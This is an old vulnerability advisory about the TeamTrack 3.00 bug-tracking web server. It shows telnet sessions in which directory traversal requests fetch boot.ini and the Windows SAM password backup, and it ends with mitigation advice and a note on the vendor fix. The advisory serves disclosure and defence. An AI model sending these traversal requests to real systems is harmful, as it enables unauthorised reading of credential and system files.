COMMAND

    TeamTrack webserver

SYSTEMS AFFECTED

    TeamTrack webserver

PROBLEM

    ".rain.forest.puppy."   found   following.     TeamTrack   server,
    published  by  TeamShare,  is  available  from  www.teamtrack.com.
    It's purpose, to quote the  web search engine spam located  at the
    bottom of their website:

        teamshare  teamtrack  web  based  defect  bug  tracking  track
        teamshare  teamtrack  web  based  defect  bug  tracking  track

    The problem is with the included web server they use to access the
    database--it  allows  unrestricted  retrieval  of  any file on the
    filesystem.  Observe this session:

        [rfp@wicca.rfp.labs rfp]$ telnet lughnasad.rfp.labs 80
        Trying 10.10.10.9...
        Connected to lughnasad.rfp.labs.
        Escape character is '^]'.
        GET /../../../../../../../boot.ini HTTP/1.0

        HTTP/1.0 200 OK
        Server: TeamTrack/3.00(3097)
        Date: Sat, 02 Oct 1999 04:19:48 GMT
        Last-Modified: Sat, 02 Oct 1999 04:19:48 GMT
        Accept-Ranges: bytes
        Last-Modified: Thu, 29 Jul 1999 03:56:08 GMT
        Content-Length: 382
        Content-Type: text/html

        [boot loader]
        timeout=30
        default=multi(0)disk(0)rdisk(0)partition(1)\WINNT
        [operating systems]
        multi(0)disk(0)rdisk(0)partition(1)\WINNT="Windows NT Server, Enterprise
        Edition Version 4.00"
        multi(0)disk(0)rdisk(0)partition(1)\WINNT="Windows NT Server, Enterprise
        Edition Version 4.00 [VGA mode]" /basevideo /sos
        Connection closed by foreign host.

    In case you haven't figured it out already, it runs on NT, and  as
    a service.  This means it has system access to any file.

        [rfp@wicca.rfp.labs rfp]$ telnet lughnasad.rfp.labs 80
        Trying 10.10.10.9...
        Connected to lughnasad.rfp.labs.
        Escape character is '^]'.
        GET /../../../../../winnt/repair/sam._ HTTP/1.0

        HTTP/1.0 200 OK
        Server: TeamTrack/3.00(3097)
        Date: Sat, 02 Oct 1999 04:40:30 GMT
        Last-Modified: Sat, 02 Oct 1999 04:40:30 GMT
        Accept-Ranges: bytes
        Last-Modified: Thu, 29 Jul 1999 03:43:10 GMT
        Content-Length: 3330
        Content-Type: text/html

        ,IPý&f $$hive$$.tm}h± <....data cut...don't want you seeing my SAM!...>

SOLUTION

    TeamTrack   also   includes   the    option   to   use    Netscape
    FastTrack/Enterprise or  IIS instead.   Look into  this.   The SP4
    readme includes information/instructions on how to migrate to  one
    of these webservers.

    Again, this Web server is installed and set up to be launched when
    TeamTrack is installed ONLY IF one of the recommended Web  servers
    (IIS or Netscape Enterprise/FastTrack) is not already installed on
    the target computer, greatly minimizing the risk of the web server
    being enabled on a production computer.

    This was resolved  in TeamTrack 4.0  software, entering beta  now.
    This software version should be generally available during January
    2000.